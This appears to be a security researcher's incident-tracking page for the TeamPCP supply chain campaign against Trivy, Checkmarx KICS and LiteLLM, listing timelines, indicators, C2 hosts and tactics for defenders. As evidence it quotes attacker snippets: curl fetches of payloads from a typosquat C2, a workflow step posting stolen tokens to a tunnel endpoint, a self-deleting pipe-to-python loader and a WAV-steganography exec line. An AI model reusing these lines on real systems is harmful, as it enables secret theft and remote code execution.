Active Investigation

TeamPCP Supply Chain Campaign

A multi-week, multi-ecosystem attack chain spanning GitHub Actions, Docker Hub, npm, PyPI, and OpenVSX. Impacted so far: Aqua's Trivy, Checkmarx KICS, and LiteLLM.

Last updated: 2026-03-24 17:04 UTC

Campaign So Far

Trivy (Aqua): The initial victim after incomplete containment following 03/01 PwnRequest. Attackers published malicious builds. (blog post, security advisory, GHSA-69fq-xp46-6x23)
KICS (Checkmarx): OpenVSX extension and GitHub Action hijacked via compromised account. Repo restored Mar 23. (Statement)
LiteLLM (BerriAI): PYPI_PUBLISH token harvested via Trivy in CI/CD. Versions 1.82.7/1.82.8 removed from PyPI. (Issue #24512 · PYSEC-2026-2)

Detailed Analysis

Want a detailed analysis? Check out our blog posts: Trivy Compromised and TeamPCP Attacks KICS

Precursor

February 27, 2026

Threat actor MegaGame10418 executed a Pwn Request against Trivy's CI, exploiting a vulnerable pull_request_target workflow to exfiltrate the aqua-bot PAT. Incomplete credential rotation enabled the current attacks.

Show details

Analysis View on BoostSecurity ↗

Observed impact (per Aqua):

Repository made private and renamed to aquasecurity/private-trivy; empty repo pushed in its place
GitHub Releases v0.27.0–v0.69.1 deleted, including discussions and assets
Malicious artifact pushed to Trivy's VSCode extension on Open VSIX marketplace, using former employee's token

Remediation:

Aqua removed the vulnerable workflow, revoked the malicious extension token, restored the repo, and republished v0.69.2. Container images and package manager installs were unaffected; binary downloads and Trivy Action were temporarily degraded.

What they missed:

Credential rotation "wasn't atomic and attackers may have been privy to refreshed tokens" — enabling the current flurry of attacks.

Phase 01

Initial Compromise

v0.69.4 tag pushed -> references imposter commits (trivy, actions/checkout) → C2 fetch (scan.aquasecurtiy.org / 45.148.10.212) → cred stealer in built artifacts

Malicious Commit Exfiltration

Imposter Commit to actions/checkout

Attacker creates a malicious commit impersonating rauchg (Guillermo Rauch) in the actions/checkout repository. Payload fetches malicious Go files from typosquatted C2 and injects them into the build.

GitHub Commit View on GitHub ↗

70379aad actions/checkout

Impersonated author: Guillermo Rauch <rauchg@gmail.com>
Spoofed date: 2026-01-09T07:42:00Z
Message: "Fix tag handling: preserve annotations and explicit fetch-tags (#2356)"

# Payload fetches malicious Go from typosquatted C2
# scan.aquasecurtiy.org → 45.148.10.212 (TECHOFF SRV LIMITED, Amsterdam)
BASE="https://scan.aquasecurtiy.org/static"
curl -sf "$BASE/main.go" -o cmd/trivy/main.go
curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go
curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go
curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go
curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml
                  

Show evidence

Malicious Commit Persistence

Imposter Commit to aquasecurity/trivy

Attacker duplicates a prior legitimate contribution and impersonates DmitriyLewen. This malicious commit references the imposter checkout action, establishing the attack chain.

GitHub Commit View on GitHub ↗

1885610c aquasecurity/trivy

Impersonated author: DmitriyLewen <91113035+DmitriyLewen@users.noreply.github.com>
Spoofed date: 2026-03-04T10:13:53Z
Message: "fix(ci): Use correct checkout pinning"

Show evidence

Tag Push Release

17:43:37 UTC

Malicious v0.69.4 Tag Pushed

Tag v0.69.4 pushed to trivy repository, pointing to the malicious commit. This triggers automated release workflows.

Git Tag

v0.69.4 aquasecurity/trivy

Triggers release workflow (now deleted) and other CI automations

Show evidence

Distribution Supply Chain

Malicious Releases Distributed

Automated workflows publish the malicious v0.69.4 release to multiple distribution channels, maximizing supply chain impact.

Distribution Channels

Affected distribution channels:

1. GitHub Releases
• trivy v0.69.4 release page with malicious binaries

2. Container Registries
• public.ecr.aws/aquasecurity/trivy:0.69.4
• docker.io/aquasec/trivy:0.69.4
• ghcr.io/aquasecurity/trivy:0.69.4

3. Homebrew
• Not impacted (builds from source)
• Formula revoked v0.69.4 as precautionary measure

Removed by Aqua at 21:36 UTC (Mar 19)

Show evidence

Phase 02

Lateral Movement via compromised aqua-bot identity

aqua-bot compromised → malicious workflows steal creds (tfsec, trivy-action, traceeshark) → trivy-action + setup-trivy tags pointed to malicious versions

Workflow Injection Secret Dump

21:31:23 UTC

tfsec Workflow Compromised

Malicious workflow added to aquasecurity/tfsec using compromised aqua-bot identity. Workflow dumps secrets, then is reverted.

Workflow

a67fd5b5b119 aquasecurity/tfsec

View commit (aqua-bot) ↗

# Exfil via Cloudflare Tunnel
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{twitter_consumer_key, twitter_access_token, twitter_consumer_secret,
          twitter_access_token_secret, gpg_private_key, gpg_passphrase,
          dockerhub_user, dockerhub_token, github_token, slack_webhook}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

View workflow run (SCP failed) ↗

Show evidence

Workflow Injection Secret Dump

21:35:34 UTC

traceeshark Workflow Compromised

Same attack pattern applied to aquasecurity/traceeshark. Malicious workflow injected via compromised bot account.

Workflow

56591dfe113b aquasecurity/traceeshark

View commit (aqua-bot) ↗

# Exfil via Cloudflare Tunnel (GITHUB_TOKEN only)
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{github_token}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

Show evidence

Workflow Injection Secret Dump

21:36:28 UTC

trivy-action Workflow Compromised

Attack continues to aquasecurity/trivy-action. This repository is particularly critical as it's used by thousands of downstream projects.

Workflow

93ed4111101 aquasecurity/trivy-action

View commit (aqua-bot) ↗

High-impact target: GitHub Action used by thousands of CI/CD pipelines

# Exfil via Cloudflare Tunnel (GITHUB_TOKEN only)
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{github_token}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

Show evidence

Phase 03

Malicious Distribution

Tag Manipulation Supply Chain

22:08 UTC

Malicious Action Tags Published

Using compromised aqua-bot credentials, attacker publishes malicious tags for trivy-action and setup-trivy, potentially affecting all downstream users.

Supply Chain Impact

Affected actions:
• aquasecurity/trivy-action
• aquasecurity/setup-trivy

Any workflow using these actions without SHA pinning may have executed malicious code.

Note: Poisoned tags received GitHub's "Immutable" badge — malicious commits were unsigned (originals were GPG-signed).

Payload Analysis Socket.dev ↗

Three-stage payload:

1. Collect — Dump Runner.Worker process memory via /proc/<pid>/mem, grep for {"value":"<secret>","isSecret":true} pattern. Harvest SSH keys, cloud creds (AWS/GCP/Azure), k8s tokens, crypto wallets.

2. Encrypt — AES-256-CBC + RSA-4096 hybrid encryption, bundle as tpcp.tar.gz

3. Exfiltrate — POST to typosquat scan[.]aquasecurtiy[.]org. Fallback: create tpcp-docs repo on victim's GitHub, upload as release asset.

Show evidence

Phase 04

Obfuscation coordinated spam flood

Spam Flood 96 Accounts

00:08:33 - 00:09:00 UTC (Mar 20)

Discussion #10420 Flooded

96 spam accounts posted generic praise comments within ~30 seconds, drowning technical discussion and incident coordination. Includes troll comments referencing "sugma" and "ligma".

GitHub Discussion View discussion ↗

Sample accounts (96 total):

praiitt, Hancie123, rivadaviaPlataformas, aalkhraissi, vikashmedicheck, thealphadev01, mildlyinfuriating514, ssynerg, kronmetrics, jorgePanitaDev, Ethan-0218, DeployStarshipMatt, bercanozcan, E-jewelry, Christopher933, epiktechnocravers, NomadNiko, Vanshh20, GeorgiMY, durmanko, putra-0, shanefleet, sayush-nelka, YogeshwarInnovationEcoSolutions, kelvinelove, tinkatinka, phucnhkimei, YeaminRaat, mike2505, Vlasuz, bo7, PeterNHub, 18pixels, BMAAustralia, ADRIANO125, abarriostoros, nvdstore, simar525, prajeshmadhavi, anket-troi, pavlevlajic, lazyatra, aamitn, DmitriyG228, sanchir2011, NTAravind, Rishabhamogh, jk-sumit-kumar, pksurya, pankajthoughtwin, harshjf, techlead-shootorder, cmlibra71, pankaj-kaule, devslocalsig, moeedbhatti77, clubee-machine-user, DouglasGuiduce, Youssef6022, gbnijnugyf, Aznair25, teknomaintsistemi, TheoCanonne, usmanialiq, mmdGhanbari, kkgkaundal, potatomask, infogelisimsoft, AsadAbdullahAAM, Stoii2002, JaewhangShin, bothap, davidgutierrezalkostomax, Duplex19, mahesh-sini, mj6uc, kashif-dot, PAWAN1SINGH, siscontri-dev, PasovitTechnologies, husitawi, realmankwon, iacoshoria, programonaut, farrukhan11, riverLethe, ftfuture, arshad-wbst, Balerionth, desirit, ThibaultEcta, nathandentzau, Eacaw, sahil-bibox, ascorptech, natenaelme, himelali

Show evidence

Phase 05

npm Worm CanisterWorm propagation

Stolen npm tokens → self-propagating worm → ICP canister C2 → 28+ packages compromised in <60 seconds

Worm npm Supply Chain

20:45 UTC (Mar 20)

CanisterWorm Deployed to npm

Less than 24 hours after the Trivy compromise, TeamPCP deployed a self-propagating worm across npm. The worm uses the same ICP canister (tdtqy-oyaaa-aaaae-af2dq-cai) as the Trivy fallback C2—confirming shared infrastructure.

Analysis Aikido Security ↗

Worm behavior:
1. Steals npm tokens from compromised CI/CD runners
2. Resolves usernames, enumerates publishable packages
3. Bumps patch versions and publishes malicious payload
4. 28 packages infected in under 60 seconds

Affected scopes: @EmilGroup (28 pkgs), @opengov (16 pkgs), @teale.io, @airtm, @pypestream

Persistence: systemd service (pgmon.service) with Restart=always, masquerading as PostgreSQL monitoring

# C2 Infrastructure (ICP Canister)
hxxps://tdtqy-oyaaa-aaaae-af2dq-cai[.]raw[.]icp0[.]io/

# Filesystem artifacts
~/.local/share/pgmon/service.py
~/.config/systemd/user/pgmon.service
/tmp/pglog
/tmp/.pg_state
                  

Show evidence

Phase 06

ICP Fallback Activated kamikaze.sh deployed

ICP C2 fallback activated → kamikaze.sh payload → K8s DaemonSet escape → Iran-targeted wiper

Wiper K8s Escape

~11:45 UTC (Mar 22)

kamikaze.sh v1 Payload Active on ICP C2

The ICP canister fallback C2 (tdtqy-oyaaa-aaaae-af2dq-cai) is serving kamikaze.sh—a Kubernetes-focused payload with an Iran-targeted wiper. Monolithic 150-line bash script with embedded logic.

Payload Analysis @CharlieEriksen ↗

Kubernetes attack chain:
1. Detects K8s environment via /var/run/secrets/kubernetes.io/serviceaccount
2. Deploys privileged DaemonSet (host-provisioner-std) to kube-system
3. Escapes to host via hostPath: / mount
4. Installs systemd persistence (internal-monitor.service)
5. Python stager polls ICP C2 every 50 minutes

Iran-targeted destruction:
Detects Iranian systems via timezone (Asia/Tehran) or locale (fa_IR), then executes rm -rf / --no-preserve-root. This is a destructive wiper, not credential theft.

# Persistence paths
/var/lib/svc_internal/runner.py
/etc/systemd/system/internal-monitor.service
/tmp/pglog
/tmp/.pg_state

# K8s indicators
DaemonSet: host-provisioner-std (standard payload)
DaemonSet: host-provisioner-iran (wiper payload)
Namespace: kube-system

# Distinctive signals
YouTube killswitch - stager skips URLs containing youtube.com
PostgreSQL mimicry - pglog, .pg_state naming for stealth
"kamikaze" name - Japanese term, possible misdirection
                  

Show evidence

Modular C2 Anti-Forensics

~12:45 UTC (Mar 22)

kamikaze.sh v2: Modular Architecture

ICP canister now redirects to Cloudflare tunnel. Payload evolved from monolithic bash to 15-line loader that fetches kube.py from C2 at runtime, then self-deletes.

Payload Diff

Architecture changes (v1 → v2):
• 150-line monolithic bash → 15-line loader + remote kube.py
• Payload now fetched at runtime (update without redistributing loader)
• Self-deletion added (rm -- "$0")

kube.py escalations:
• Added hostPID: true (can see host processes)
• Iran wiper now forces reboot after deletion
• Container renamed to kamikaze (explicit)
• Systemd hardened with After=network.target, RestartSec=5

Unchanged: ICP stager polling tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io

# New C2 endpoints
investigation-launches-hearings-copying.trycloudflare.com/kamikaze.sh
investigation-launches-hearings-copying.trycloudflare.com/kube.py

# New loader (self-deleting)
curl -L -s "$PY_URL" | python3 -
rm -- "$0"

# Iran wiper escalation
find /mnt/host -maxdepth 1 ... rm -rf + forced reboot
                  

Show evidence

Worm SSH + Docker

~13:00 UTC (Mar 22)

kamikaze.sh v3: Now a Worm

Major pivot: no longer K8s-focused. Now a self-propagating worm targeting SSH keys and exposed Docker APIs (port 2375). Scans local /24 subnet, parses auth logs for targets.

Worm Analysis

Tactical shift (v2 → v3):
• K8s DaemonSets removed, kubectl commented out
• SSH worm: harvests ~/.ssh/id_*, parses auth logs for user@IP pairs
• Docker API exploit: targets exposed port 2375, spawns privileged alpine container
• Subnet scanning: discovers local /24, probes ports 22 + 2375

Renamed artifacts:
• Service: internal-monitor → pgmonitor
• Path: /var/lib/svc_internal → /var/lib/pgmon

Unchanged: Iran wiper, ICP C2 stager, self-deletion

# New C2 (Cloudflare Tunnel)
championships-peoples-point-cassette.trycloudflare.com/kamikaze.sh
championships-peoples-point-cassette.trycloudflare.com/kube.py

# Worm spreading
SSH: harvests keys, parses /var/log/auth.log
Docker: port 2375 → privileged container → chroot host
Subnet: scans local /24 for ports 22, 2375

# New persistence
/var/lib/pgmon/pgmon.py
/etc/systemd/system/pgmonitor.service
                  

Show evidence

Modular Split prop.py

~13:25 UTC (Mar 22)

kamikaze.sh v3.1: Two-Module Architecture

Payload split into separate modules: kube.py (K8s DaemonSets) + prop.py (worm spreading). K8s module appears degraded (placeholder base64), but worm module fully functional.

Module Analysis

New architecture:
kamikaze.sh → kube.py → prop.py → self-delete

kube.py (K8s persistence):
• DaemonSets for K8s environments
• Iran wiper via privileged container
• PYTHON_B64 = "BASE64_HERE" — placeholder, stager broken

prop.py (worm module):
• SSH spreading with harvested keys
• Docker API exploit (port 2375)
• Auth log parsing, subnet scanning
• Iran wiper on non-K8s hosts
• Working ICP stager (pgmonitor service)

# New loader fetches both modules
curl -L -s "$PY_URL" | python3 -   # kube.py
curl -L -s "$PY_URL2" | python3 -  # prop.py (NEW)
rm -- "$0"

# New endpoint
championships-peoples-point-cassette.trycloudflare.com/prop.py

# K8s module degraded
PYTHON_B64 = "BASE64_HERE"  (placeholder)
                  

Show evidence

Production C2 Rotation

14:56 UTC (Mar 22)

kamikaze.sh v3.2: Production-Ready Deployment

C2 infrastructure rotated. The placeholder PYTHON_B64 from v3.1 now contains actual ICP backdoor payload—v3.1 appears to have been a dev/test build.

Version Diff

Changes from v3.1:

C2 Infrastructure: Rotated from championships-peoples-point-cassette to new Cloudflare Tunnel

kubectl install: Re-enabled (was commented out in v3.1)

PYTHON_B64 payload: v3.1 had placeholder BASE64_HERE; v3.2 embeds actual ICP C2 backdoor

prop.py: No functional changes (whitespace only)

# New C2 (rotated Cloudflare Tunnel)
create-sensitivity-grad-sequence.trycloudflare.com/kamikaze.sh
create-sensitivity-grad-sequence.trycloudflare.com/kube.py
create-sensitivity-grad-sequence.trycloudflare.com/prop.py

# Payload suite
kamikaze.sh  → Loader (installs kubectl, fetches Python)
kube.py      → K8s DaemonSet + Iran wiper (NOW WORKING)
prop.py      → SSH/Docker worm (unchanged)

# Key fix: PYTHON_B64 now contains real ICP stager
v3.1: PYTHON_B64 = "BASE64_HERE"  (broken)
v3.2: PYTHON_B64 = "[actual backdoor]"  (functional)
                  

Show evidence

Steganography WAV Payloads

~16:15 UTC (Mar 22)

kamikaze.sh v3.3: WAV Steganography

Payloads now hidden in WAV audio files. Python modules embedded as base64 in audio frames, extracted at runtime. Evades .py filters and static analysis.

Evasion Technique

Delivery change (v3.2 → v3.3):

Before: kube.py, prop.py (direct download)
After: bg_kube.wav, bg_prop.wav (audio files)

Evasion benefits:
• Bypasses .py file extension filters
• Evades string-based static analysis
• Looks like legitimate audio to casual inspection
• Valid WAV header (RIFF, 8-bit mono, 44100 Hz)

# Extraction technique
import wave, base64
w = wave.open('payload.wav', 'rb')
exec(base64.b64decode(w.readframes(w.getnframes())))

# New endpoints
create-sensitivity-grad-sequence.trycloudflare.com/bg_kube.wav
create-sensitivity-grad-sequence.trycloudflare.com/bg_prop.wav

# Core functionality unchanged:
# K8s DaemonSet, SSH/Docker worm, Iran wiper, ICP C2
                  

Show evidence

Phase 07

Docker Hub Direct Push bypassing GitHub releases

Compromised Docker Hub creds → direct image push → 0.69.5, 0.69.6 tags → no corresponding GitHub release

Malicious Image Docker Hub

15:43 UTC (Mar 22)

aquasec/trivy:0.69.5 pushed to Docker Hub

Attacker pushes malicious image directly to Docker Hub, bypassing the GitHub release process entirely. No corresponding v0.69.5 tag exists on GitHub—this is a direct registry attack using compromised credentials. Image propagates to third-party mirrors including mirror.gcr.io.

Docker Hub View on Docker Hub ↗

sha256:f69a8a4... aquasec/trivy:0.69.5

Attack significance: This proves Docker Hub credentials were compromised separately from GitHub. The attacker can push arbitrary images without going through GitHub Actions or release workflows.

Show evidence

Malicious Image Docker Hub

16:34 UTC (Mar 22)

aquasec/trivy:0.69.6 pushed to Docker Hub

Second malicious image pushed less than an hour after 0.69.5. Attacker continues to exploit Docker Hub access while GitHub-side compromise is being remediated. Also propagates to third-party mirrors.

Docker Hub View on Docker Hub ↗

sha256:dd8beb3b... aquasec/trivy:0.69.6

Community discovery: Spotted by @rut64449 in GitHub discussion. These versions don't exist in GitHub releases—purely Docker Hub artifacts.

Show evidence

Data Exfil Internal Repos

Mar 22, 20:31–20:32 UTC

Internal Aqua Repos Publicized via aquasec-com Org

Using compromised Argon-DevOps-Mgt service account, attacker defaced 44 repositories in aquasec-com—Aqua's internal GitHub org—in a 2-minute automated blitz. All repos renamed with tpcp-docs- prefix; internal assets now publicly exposed.

Analysis OpenSourceMalware ↗

Exposed internal repos (sample):
• tracee - runtime security
• kube-hunter - K8s pentesting tool
• jenkins_jobs_backups - CI/CD configs
• kb-personal-yaniv - personal knowledge base
• supply-chain-lambdas - infrastructure code

# Token test (7 hours before defacement)
13:24:25 UTC - Ghost branch on trivy-plugin-aqua
Branch: update-plugin-links-v0.218.2
Created and deleted same second (no v0.218.2 release exists)

# Defacement
20:31:07 – 20:32:26 UTC - Automated API calls
44 repositories renamed to tpcp-docs-* prefix
Via: Argon-DevOps-Mgt service account PAT
                  

Show evidence

2026-03-22 21:31 UTC

ICP Canister Denylisted

C2 endpoint taken down due to policy violation

2026-03-22 23:20 UTC

aquasec-com Repositories Cleaned

Internal org repos restored and defacement removed

2026-03-23 01:40 UTC

Malicious Docker Tags Removed

All 15 tags removed from Docker Hub (0.69.5, 0.69.6, latest + arch variants) — ~9.5 hour exposure window.

2026-03-24 ~06:25 UTC

mirror.gcr.io Images Removed

Google removes cached malicious images from mirror.gcr.io after Aqua outreach. Confirmation.

Phase 08

Checkmarx Ecosystem same TTPs, new targets

Compromised Checkmarx accounts → OpenVSX extensions + GitHub Actions hijacked → C2 at checkmarx.zone

Malicious Extension

12:53 UTC (Mar 23)

Malicious extensions published to OpenVSX

Two extensions pushed via compromised ast-phoenix account, 12 seconds apart: ast-results v2.53.0 and cx-dev-assist v1.7.0. Payload checks for cloud credentials before downloading second-stage from checkmarx[.]zone. VS Code Marketplace unaffected.

Analysis Wiz ↗ Checkmarx (Official) ↗

Note: Checkmarx official disclosure lists 02:53 UTC (likely typo for 12:53) and claims 15:41 UTC removal — but malicious versions remained downloadable as of Mar 24 09:00 UTC.

Show evidence

Tag Hijack Credential Theft

12:58 UTC (Mar 23)

35 KICS versions redirected to malicious commits

Attacker compromises cx-plugins-releases service account (ID 225848595) and updates all 35 tags (v1 through v2.1.20) to point to staged commits containing setup.sh credential stealer.

Analysis View on Wiz ↗

cx-plugins-releases Checkmarx/kics-github-action

New infrastructure: C2 at checkmarx.zone (distinct from prior Trivy operations)

Fallback exfil: Creates docs-tpcp repo using victim GITHUB_TOKEN if primary C2 fails

Attribution: Same RSA public key and naming conventions as Trivy attack

Show evidence

Tag Hijack

Mar 23

Checkmarx/ast-github-action v2.3.28 compromised

Same payload deployed to AST GitHub Action. Identical TTPs: setup.sh entry point, credential scraping, encrypted exfil to checkmarx[.]zone.

Analysis Sysdig ↗

Show evidence

2026-03-24 03:38 UTC

Clean OpenVSX Versions Published

ast-results v2.56.0 and cx-dev-assist v1.10.0 published (~15 hours after compromise). Malicious versions still downloadable as of 09:00 UTC.

2026-03-23 16:50 UTC

KICS Repository Taken Down

Community member reports compromise; repo taken offline. ~4 hour exposure window.

2026-03-23 18:59 UTC

KICS Repository Restored

Maintainers confirm incident resolved; repo reinstated.

Phase 09

LiteLLM PyPI infostealer via .pth injection

Compromised maintainer account → malicious PyPI releases → credential theft via .pth auto-execution

PyPI Compromise Credential Theft

10:39 & 10:52 UTC (Mar 24)

Malicious litellm 1.82.7 & 1.82.8 published to PyPI

Two malicious versions via compromised maintainer account. 1.82.8: .pth file executes on Python startup, exfil to models[.]litellm[.]cloud. 1.82.7: same KICS payload in proxy_server.py → drops p.py, exfil to checkmarx[.]zone/raw. Both harvest SSH keys, cloud credentials, env vars, crypto wallets.

Disclosure GitHub Issue ↗

Initial access: PYPI_PUBLISH token stored as GitHub env var, harvested via Trivy in LiteLLM CI/CD (author confirmed)

Affected: litellm 1.82.7, 1.82.8 (quarantined). Docker proxy users protected (pinned deps).

1.82.8: litellm_init.pth → models.litellm.cloud
1.82.7: proxy_server.py → p.py → checkmarx.zone/raw (same as KICS)

Attribution: Same RSA key and tpcp.tar.gz naming

Show evidence

Spam Botnet

12:44 UTC (Mar 24)

Spam flood targets security disclosure

28 spam comments posted in 43 seconds to bury Issue #24512. 25 accounts used—76% overlap with Trivy spam botnet confirms same operator. Mix of compromised developer accounts (stolen tokens) and purchased dormant accounts.

Analysis

Rate: 0.65 comments/second (automated via GitHub API)

Overlap: 19 of 25 accounts (76%) also used in Trivy spam campaign

Account types: Compromised (9), Dormant (10), New/Fake (4), Business (2)

Purpose: Obscure disclosure, delay incident response

Show evidence

Defacement

~12:59 UTC (Mar 24)

BerriAI GitHub repos defaced

Via compromised krrishdholakia account, multiple BerriAI repositories had descriptions changed to "teampcp owns BerriAI".

2026-03-24 11:25 UTC

Malicious LiteLLM Versions Quarantined

PyPI quarantines litellm 1.82.7 and 1.82.8. ~3 hour exposure window.

2026-03-24 15:35 UTC

PYSEC-2026-2 Advisory Published

PyPA publishes official advisory. Credits Callum McMahon (Futuresearch) as reporter. Project reinstated on PyPI.

Thread 01

How did they gain access to push the malicious v0.69.4 tag?

The attacker was able to push a tag to aquasecurity/trivy pointing to a malicious commit. This requires write access to the repository. Was this via a compromised PAT, GitHub App, or deploy key?

Resolution: Aqua Security confirmed the attack stemmed from incomplete containment of the March 1, 2026 incident. Credential rotation "wasn't atomic and attackers may have been privy to refreshed tokens."

Official disclosure ↗

Resolved

Thread 02

Was aqua-bot the initial access vector, or only compromised via /trivy?

The aqua-bot service account was used for lateral movement to tfsec, traceeshark, and trivy-action. However, it's unclear whether aqua-bot credentials were the initial compromise, or if they were harvested from the trivy repository's secrets after the v0.69.4 tag push triggered workflows.

Resolution: The official disclosure confirms incomplete credential rotation from the first incident allowed attackers to capture refreshed tokens, including aqua-bot credentials.

Official disclosure ↗

Resolved

Thread 03

What was the v0.70.0 trivy attacker tag?

At 17:51:17 UTC on March 19, a v0.70.0 tag was deleted. The commit (9dbb34d3ec0f) was authored by aqua-bot on March 16 — 3 days earlier — with message "Updates", modifying cmd/trivy/main.go, pkg/github/auth.go, pkg/github/repowrite.go, pkg/github/runner.go. This suggests aqua-bot compromise may predate March 19.

View commit (via Adnan Khan) ↗

Unresolved

Thread 04

What was the setup-trivy poisoning?

All 7 tags (v0.2.0-v0.2.6) were force-pushed to malicious commits. Commit 8afa9b9f spoofed contributor "thara" (Tomochika Hara). Message: "Pin Trivy install script checkout to a specific commit (#28)". Spoofed date: 2026-01-15. Exposure window: ~4 hours (17:43-21:44 UTC Mar 19).

Malicious commit ↗ Victim example (grafana) ↗

Resolved

Thread 05

Is DarkSeek3r related?

A GitHub user "DarkSeek3r" (now deleted, user ID 266895321) was created at 2026-03-10T01:44:23. Their only public activity before account deletion was forking aquasecurity/trivy and actions/checkout — the exact repositories used in this attack.

View Gist (bored-engineer) ↗

Unresolved

Network Infrastructure

C2 Domains & IPs

# Primary C2 (typosquat)
scan.aquasecurtiy.org
45.148.10.212 (TECHOFF SRV LIMITED, Amsterdam, NL)

# Cloudflare Tunnels
souls-entire-defined-routes.trycloudflare.com (v1 - CanisterWorm stager)
plug-tab-protective-relay.trycloudflare.com (exfil)
investigation-launches-hearings-copying.trycloudflare.com (v2)
championships-peoples-point-cassette.trycloudflare.com (v3/v3.1)
create-sensitivity-grad-sequence.trycloudflare.com (v3.2/v3.3)

# v3.3 WAV steganography payloads
create-sensitivity-grad-sequence.trycloudflare.com/bg_kube.wav
create-sensitivity-grad-sequence.trycloudflare.com/bg_prop.wav

# ICP Canister C2 - shared across Trivy fallback + CanisterWorm
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
# Links both attacks to same TeamPCP infrastructure

# LiteLLM typosquat C2
models.litellm.cloud (NOT litellm.ai)

# LiteLLM malicious package hashes
8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2 litellm-1.82.7.whl
d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb litellm-1.82.8.whl
8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea litellm-1.82.7.tar.gz
d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 litellm-1.82.8.tar.gz
a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b proxy_server.py
71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 litellm_init.pth
          

Malicious Commits

Imposter & Injected Commits

# Imposter commits (spoofed identities, verification.verified: false)
70379aad1a8b40919ce8b382d3cd7d0315cde1d0 actions/checkout (impersonating rauchg)
1885610c6a34811c8296416ae69f568002ef11ec aquasecurity/trivy (impersonating DmitriyLewen)
ddb9da4475c1cef7d5389062bdfdfbdbd1394648 aquasecurity/trivy-action (imposter)

# Lateral movement commits (via aqua-bot)
a67fd5b5b119 aquasecurity/tfsec
56591dfe113b aquasecurity/traceeshark
93ed41111017c3767fafc7d9cc8711f3be1a661f aquasecurity/trivy-action

# setup-trivy poisoning (January 2026, spoofing thara)
8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 aquasecurity/setup-trivy
          

Compromised Accounts

GitHub Accounts

# Compromised service account
aqua-bot (ID: 54269356, created 2019-08-19)

# Suspected attacker accounts (deleted/banned)
DarkSeek3r (ID: 266895321, created 2026-03-10T01:44:23)
          

Affected Artifacts

Poisoned Releases & Images

# Trivy v0.69.4 (~3 hour exposure: 18:22-21:42 UTC Mar 19)
ghcr.io/aquasecurity/trivy:0.69.4
docker.io/aquasec/trivy:0.69.4
public.ecr.aws/aquasecurity/trivy:0.69.4

# setup-trivy: ALL 7 tags compromised (~4 hour exposure: 17:43-21:44 UTC Mar 19)
aquasecurity/setup-trivy@v0.2.0 through v0.2.6
# Fixed: v0.2.6 (re-released)

# trivy-action: 76 of 77 tags compromised (~12 hour exposure)
# 17:43 UTC Mar 19 - 05:40 UTC Mar 20
# Never compromised: 0.35.0 (protected by GitHub immutable releases)
# Safe SHA: 57a97c7e7821a5776cebc9bb87c984fa69cba8f1
# Maintainers removed all compromised tags and re-tagged clean releases
# with a v prefix (e.g., v0.35.0 instead of 0.35.0)

# LiteLLM PyPI (quarantined)
litellm==1.82.7
litellm==1.82.8
# Contains litellm_init.pth - auto-executes on Python startup
          

Full list of affected packages (Socket.dev) ↗

Malware Signatures

Strings & Filenames

# Attribution strings
"TeamPCP Cloud stealer"
"tpcp.tar.gz" (exfil bundle)
"tpcp-docs" (fallback exfil repo / GitHub dead drop)

# Credential sweeper targets 50+ sensitive file paths

# Injected files (from C2)
cmd/trivy/main.go
cmd/trivy/scand.go
cmd/trivy/fork_unix.go
cmd/trivy/fork_windows.go
.golangci.yaml

# Target process
"Runner.Worker" (memory scraping target)

# kamikaze.sh v1 (ICP fallback payload)
/var/lib/svc_internal/runner.py
/etc/systemd/system/internal-monitor.service
DaemonSet: host-provisioner-std
DaemonSet: host-provisioner-iran (wiper)

# kamikaze.sh v2 (modular)
Container: kamikaze
hostPID: true (process namespace access)

# kamikaze.sh v3 (worm)
/var/lib/pgmon/pgmon.py
/etc/systemd/system/pgmonitor.service
Scans ports 22, 2375 on local /24
Parses /var/log/auth.log for targets
rm -- "$0" (self-deletion)
          

Threat Actor

TeamPCP

Also known as PCPcat, Persy_PCP, ShellForce, and DeadCatx3. Emerged as a significant threat to cloud-native infrastructure in late 2025.

Self-attribution string "TeamPCP Cloud stealer" found in the trivy-action payload links this incident to the group.

Telegram: @Persy_PCP, @teampcp

View on Wiz Threat Center ↗

Targets

Cloud-Native Infrastructure

Docker APIs
Kubernetes clusters
GitHub Actions runners
Ray dashboards
Redis servers
CI/CD pipelines
          

TTPs

Common Techniques

# Initial Access
Supply chain poisoning (GitHub Actions, package registries)
Exposed service exploitation (Docker, K8s, Redis)

# Credential Harvesting
/proc/[pid]/mem memory scraping
Filesystem credential sweeping (50+ paths)
Cloud metadata service (IMDS) theft

# Exfiltration
Typosquatted domains
Cloudflare Tunnels (ephemeral C2)
GitHub dead drops (tpcp-docs repos)
ICP-hosted fallback infrastructure

# Objectives
Credential theft → lateral movement
Ransomware deployment
Cryptomining
Extortion
          

Source

The Official Soundtrack of the Trivy Supply Chain Attack

Every threat actor leaves fingerprints. TeamPCP left a playlist. Songs embedded in payloads, C2 infrastructure, and attack tooling.

Big City Life

Mattafix

scan.aquasecurtiy.org Primary C2

Thank You

Dido

ICP Fallback 03/22 14:45 UTC

God Is in the Rhythm

King Gizzard And The Lizard Wizard

